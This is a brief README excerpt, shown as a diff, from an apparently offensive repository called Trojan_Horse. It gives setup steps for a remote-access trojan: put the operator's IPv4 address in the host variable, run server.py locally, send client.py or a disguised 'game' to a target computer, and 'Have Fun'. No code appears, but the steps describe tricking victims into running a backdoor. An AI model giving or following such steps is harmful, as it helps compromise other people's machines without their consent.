Zahin-Tajwar/Trojan_Horse/README.md

 - Requests

 ### Instructions
+- Enter your ipv4 address in the host variable
 - Run the server.py in your computer
 - Send the client.py or the game to the target computer & run it
 - Have Fun !!